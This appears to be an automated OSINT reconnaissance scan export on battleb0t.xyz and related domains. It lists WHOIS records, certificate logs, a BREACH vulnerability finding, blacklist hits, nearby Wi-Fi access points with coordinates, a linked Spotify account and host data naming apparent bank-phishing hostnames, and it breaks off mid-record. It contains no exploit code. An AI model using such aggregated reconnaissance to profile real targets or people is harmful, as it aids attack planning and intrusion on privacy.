Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:34.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AYSHU.XYZ
Registry Domain ID: D346635612-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: http://resellercamp.com/
Updated Date: 2023-02-01T09:46:29Z
Creation Date: 2023-02-01T09:45:59Z
Registrar Registration Expiration Date: 2024-02-01T23:59:59Z
Registrar: CV. Jogjacamp
Registrar IANA ID: 1478
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
Domain Status: clientTransferProhibited (http://icann.org/epp#clientTransferProhibited)
Registrant Organization: cP Hosting World
Registrant State/Province: Bagerhat
Registrant Country: BD
Name Server: ns1.cphostingworld.net
Name Server: ns2.cphostingworld.net
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:02:34Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
Registration Service Provided By: RESELL CORE
The data in this whois database is provided to you for information purposes
only, that is, to assist you in obtaining information about or related to a
domain name registration record. We make this information available "as is",
and do not guarantee its accuracy. By submitting a whois query, you agree
that you will use this data only for lawful purposes and that, under no
circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail, or
by telephone.
The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar of
record is CV. Jogjacamp.
We reserve the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
| ayshu.xyz |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.135.9 |
| 2023-05-12 03:05:12 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | fluid.battleb0t.xyz |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.150): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.19): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.221): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TB Proprietary Channel. Bc (Net ID: 00:04:32:1C:D9:49) | 39.0469, -77.4903 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bursa (Net ID: 00:08:5C:7B:38:A1) | 40.2024, 29.0398 |
| 2023-05-12 02:45:31 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 185.199.110.153 |
| 2023-05-12 03:03:27 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | nwapi.battleb0t.xyz |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | Iceland | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.218): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SENSEO2 (Net ID: 00:01:24:F2:7F:EC) | 52.3759, 4.8975 |
| 2023-05-12 02:45:31 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [185.199.111.153] | 185.199.111.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Verorouter5 (Net ID: DC:EF:09:A7:2C:2E) | 37.751, -97.822 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Amethyst (Net ID: 00:01:21:30:76:B8) | 41.8781, -87.6298 |
| 2023-05-12 03:19:24 | Blacklisted IP Address | Yes | UCEPROTECT | 0 | 1 | 3 | 0 | None | UCEPROTECT - Level 2 (some false positives) (104.196.30.220) | 104.196.30.220 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:39:9C:6E) | 50.1188, 8.6843 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Spotify (Category: music)
https://open.spotify.com/user/ayshoo | ayshoo |
| 2023-05-12 02:44:13 | Raw Data from RIRs | No | Certificate Transparency | 16 | 0 | 1 | 0 | None | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
| battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.20): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PartyVan (Net ID: 00:00:C0:16:5F:81) | 34.0544, -118.244 |
| 2023-05-12 02:46:05 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis sandbox report omitted] | 185.199.111.153 |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-oo.github.io |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | United States | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomF2385E (Net ID: 00:0C:F6:F2:38:5E) | 50.8897, 6.0563 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Led Zeppelin (Net ID: 00:01:24:F1:B5:5B) | 34.0544, -118.244 |
| 2023-05-12 03:04:46 | Hosting Provider | No | Hosting Provider Identifier | 0 | 0 | 3 | 0 | None | Google App Engine: https://cloud.google.com/appengine | 104.196.30.220 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | LALOFT (Net ID: 00:01:95:7C:7F:2C) | 34.0544, -118.244 |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | [raw certificate log records omitted] |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:50c0:8002::153 | battleb0t.xyz |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-256-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
